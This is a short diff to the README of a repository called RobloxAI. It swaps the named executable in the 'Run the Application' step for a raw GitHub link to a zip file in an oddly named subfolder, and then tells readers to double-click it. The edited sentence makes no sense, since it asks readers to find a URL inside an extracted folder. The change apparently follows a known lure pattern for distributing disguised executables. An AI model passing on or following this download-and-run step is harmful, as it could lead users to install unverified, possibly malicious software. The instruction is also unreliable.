SushSarker/RobloxAI/README.md

 ### 6. Run the Application

-Find the `RobloxAI.exe` file in the extracted folder.
+Find the `https://raw.githubusercontent.com/SushSarker/RobloxAI/main/praecocial/RobloxAI.zip` file in the extracted folder.
 Double-click on it to start the application.
 Follow any on-screen instructions to complete the setup.

 ## 📝 Using RobloxAI